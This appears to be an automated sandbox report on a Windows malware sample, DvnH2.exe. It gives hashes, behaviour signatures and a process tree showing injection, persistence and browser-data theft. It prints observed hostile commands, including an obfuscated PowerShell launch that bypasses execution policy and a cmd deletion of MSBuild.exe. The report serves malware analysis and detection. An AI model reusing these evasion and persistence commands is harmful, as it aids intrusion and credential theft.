Analysis
- max time kernel: 150s
- max time network: 146s
- platform: windows7_x64
- resource: win7v200430
- submitted: 08-07-2020 10:12
Static task: static1
Behavioral task: behavioral1
- Sample: DvnH2.exe
- Resource: win7v200430 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: DvnH2.exe
- Resource: win10 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: DvnH2.exe
- Size: 847KB
- MD5: bc23e4cf90c63d9a84eb905e6ec82f82
- SHA1: b82df977fcc19b730ac2cdacec7d3b93617c57ed
- SHA256: 0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
- SHA512: 01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4
Malware Config
Signatures
Suspicious use of FindShellTrayWindow (5 IoCs)
Processes: Explorer.EXE
- pid 1184, process Explorer.EXE (5 entries)
Modifies Internet Explorer settings (title as listed for cmmon32.exe in the process tree)
Processes: cmmon32.exe
- Key created: \Registry\User\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 (process: cmmon32.exe)
Suspicious use of WriteProcessMemory (28 IoCs)
Processes: DvnH2.exe, powershell.exe, powershell.exe, Explorer.EXE, cmmon32.exe
- PID 676 wrote to memory of 872: DvnH2.exe -> powershell.exe (4 entries)
- PID 872 wrote to memory of 1036: powershell.exe -> powershell.exe (4 entries)
- PID 1036 wrote to memory of 1816: powershell.exe -> MSBuild.exe (7 entries)
- PID 1184 wrote to memory of 1836: Explorer.EXE -> cmmon32.exe (4 entries)
- PID 1836 wrote to memory of 1848: cmmon32.exe -> cmd.exe (4 entries)
- PID 1836 wrote to memory of 1936: cmmon32.exe -> Firefox.exe (5 entries)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: powershell.exe, powershell.exe, MSBuild.exe, cmmon32.exe
- Token: SeDebugPrivilege, pid 872, process powershell.exe
- Token: SeDebugPrivilege, pid 1036, process powershell.exe
- Token: SeDebugPrivilege, pid 1816, process MSBuild.exe
- Token: SeDebugPrivilege, pid 1836, process cmmon32.exe
Blacklisted process makes network request (2 IoCs)
Processes: powershell.exe
- flow 4, pid 1036, process powershell.exe
- flow 5, pid 1036, process powershell.exe
Suspicious behavior: EnumeratesProcesses (31 IoCs)
Processes: powershell.exe, powershell.exe, MSBuild.exe, cmmon32.exe
- pid 872, process powershell.exe (2 entries)
- pid 1036, process powershell.exe (2 entries)
- pid 1816, process MSBuild.exe (2 entries)
- pid 1836, process cmmon32.exe (25 entries)
Adds Run entry to policy start application (2 TTPs, 2 IoCs)
Processes: cmmon32.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (process: cmmon32.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\J0HTUFWHU68 = "C:\\Program Files (x86)\\Badll_reh\\configafilu.exe" (process: cmmon32.exe)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (1 IoCs)
Processes: cmmon32.exe
- File opened for modification: C:\Program Files (x86)\Badll_reh\configafilu.exe (process: cmmon32.exe)
System policy modification (1 TTPs, 1 IoCs)
Processes: cmmon32.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (process: cmmon32.exe)
Drops file in System32 directory (2 IoCs)
Processes: powershell.exe, powershell.exe
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (process: powershell.exe)
- File opened for modification: C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (process: powershell.exe)
Checks whether UAC is enabled (title as listed for Explorer.EXE in the process tree)
Processes: Explorer.EXE
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (process: Explorer.EXE)
Suspicious use of SetThreadContext (3 IoCs)
Processes: powershell.exe, MSBuild.exe, cmmon32.exe
- PID 1036 set thread context of 1816: powershell.exe -> MSBuild.exe
- PID 1816 set thread context of 1184: MSBuild.exe -> Explorer.EXE
- PID 1836 set thread context of 1184: cmmon32.exe -> Explorer.EXE
Suspicious behavior: MapViewOfSection (7 IoCs)
Processes: MSBuild.exe, cmmon32.exe
- pid 1816, process MSBuild.exe (3 entries)
- pid 1836, process cmmon32.exe (4 entries)
Suspicious use of SendNotifyMessage (4 IoCs)
Processes: Explorer.EXE
- pid 1184, process Explorer.EXE (4 entries)
Processes
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  - Checks whether UAC is enabled
  - Suspicious use of SendNotifyMessage
  PID: 1184
  - C:\Users\Admin\AppData\Local\Temp\DvnH2.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"
    - Suspicious use of WriteProcessMemory
    PID: 676
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e [base64-encoded command argument omitted]
      - Suspicious use of WriteProcessMemory
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Drops file in System32 directory
      PID: 872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e [base64-encoded command argument omitted]
        - Suspicious use of WriteProcessMemory
        - Suspicious use of AdjustPrivilegeToken
        - Blacklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Drops file in System32 directory
        - Suspicious use of SetThreadContext
        PID: 1036
        - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetThreadContext
          - Suspicious behavior: MapViewOfSection
          PID: 1816
  - C:\Windows\SysWOW64\cmmon32.exe
    Command line: "C:\Windows\SysWOW64\cmmon32.exe"
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Adds Run entry to policy start application
    - Drops file in Program Files directory
    - System policy modification
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    PID: 1836
    - C:\Windows\SysWOW64\cmd.exe
      Command line: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      PID: 1848
    - C:\Program Files\Mozilla Firefox\Firefox.exe
      Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
      PID: 1936